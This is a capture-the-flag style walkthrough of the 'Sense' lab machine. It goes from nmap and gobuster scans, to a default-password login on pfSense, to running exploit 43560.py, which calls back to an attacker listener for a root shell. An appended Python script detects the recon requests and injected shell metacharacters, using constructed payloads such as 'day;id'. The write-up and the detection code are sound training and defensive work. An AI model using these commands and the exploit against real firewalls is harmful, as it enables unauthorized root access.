Again, we start with nmap -sC -sV -Pn -p- -oA ./Sense 10.10.10.60
Only HTTP and HTTPS are open, so we start there. As with all strictly web-based boxes, run gobuster against it using:
gobuster dir -w /usr/share/dirbuster/wordlists/directory-list-lowercase-2.3-medium.txt -u https://10.10.10.60:443 -k -x php,txt
The -k flag skips TLS certificate validation (without it gobuster errors out on the certificate), and -x tells gobuster to also look for files with the php and txt extensions.
Gobuster shows us there is a changelog.txt and a system-users.txt file that we can "snag". Let's see what those say. It might give us a glimpse into what is running and what version.
OK. So we're dealing with pfSense, and system-users.txt gives us a Username:Password combination of Rohit:"company defaults". Looking on pfSense's website, we find that the default password is pfsense. Let's try logging in as rohit:pfsense. We can successfully log in with those credentials, and the dashboard shows pfSense version 2.1.3-RELEASE on FreeBSD 8.3-RELEASE-p16.
Let's see what vulns exist for that version. There are a few, in particular a Command Injection in status_rrd_graph_img.php (5th from the bottom in the search results, exploit 43560.py).
Let's see what the exploit looks like.
Looks simple enough. It asks for the remote host, local host, local port, username, and password. We have all those things.
python3 43560.py --rhost 10.10.10.60 --lhost 10.10.14.10 --lport 9999 --username rohit --password pfsense
Awesome. Now, who am I logged in as? Surprise! Instant one-step root shell. I love them when they're easy.
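From the other side of the box: everything above leaves a trail in the pfSense web server log, from the gobuster hits on changelog.txt and system-users.txt to the request that carries the command injection into status_rrd_graph_img.php. The script below is an added detection example, not part of the original writeup or the exploit. It assumes Apache/nginx combined log format; the log lines, query parameter name and payloads are constructed for the demo and are not taken from 43560.py.

```python
import re
from urllib.parse import urlsplit, unquote, unquote_plus

# Constructed sample lines in "combined" log format; not real captured traffic.
# Parameter name and payloads are constructed for the demo, not taken from the exploit.
SAMPLE_LOG = """\
10.10.14.10 - - [01/Jan/2024:10:00:01 +0000] "GET /changelog.txt HTTP/1.1" 200 271 "-" "gobuster/3.1"
10.10.14.10 - - [01/Jan/2024:10:00:02 +0000] "GET /system-users.txt HTTP/1.1" 200 106 "-" "gobuster/3.1"
10.10.14.10 - - [01/Jan/2024:10:00:09 +0000] "GET /status_rrd_graph_img.php?graph=day%3Bid HTTP/1.1" 200 0 "-" "python-requests/2.25"
10.10.14.10 - - [01/Jan/2024:10:00:10 +0000] "GET /status_rrd_graph_img.php?graph=day%7Cid HTTP/1.1" 200 0 "-" "python-requests/2.25"
10.10.14.20 - - [01/Jan/2024:10:05:00 +0000] "GET /status_rrd_graph_img.php?graph=day HTTP/1.1" 200 9123 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$')
RECON_FILES = {"/changelog.txt", "/system-users.txt"}  # files gobuster found in the walkthrough
INJECTION_ENDPOINT = "/status_rrd_graph_img.php"      # vulnerable page named in the walkthrough
# Shell metacharacters that have no business in an RRD graph request.
SHELL_META = re.compile(r"[;|&`\n]|\$\(")


def analyze(log_text):
    """Return (ip, category, detail) for each suspicious request in the log."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # unparseable line; a real pipeline would count these too
        parts = urlsplit(m["target"])
        path = unquote(parts.path)
        if path in RECON_FILES:
            findings.append((m["ip"], "recon-file", path))
        elif path == INJECTION_ENDPOINT:
            # Split on '&' only: older parse_qsl also split on ';', which would hide it.
            for pair in parts.query.split("&"):
                key, _, raw = pair.partition("=")
                value = unquote_plus(raw)  # decode %3B, %7C etc. before matching
                if SHELL_META.search(value):
                    findings.append((m["ip"], "cmd-injection", f"{key}={value}"))
                    break
    return findings


def by_source(findings):
    """Count findings per client IP so the scanning host stands out."""
    counts = {}
    for ip, _, _ in findings:
        counts[ip] = counts.get(ip, 0) + 1
    return counts


if __name__ == "__main__":
    for finding in analyze(SAMPLE_LOG):
        print(finding)
    print(by_source(analyze(SAMPLE_LOG)))
```

The legitimate graph request from 10.10.14.20 produces no finding; the four requests from the attacking host do, and the decoded detail shows the injected metacharacter.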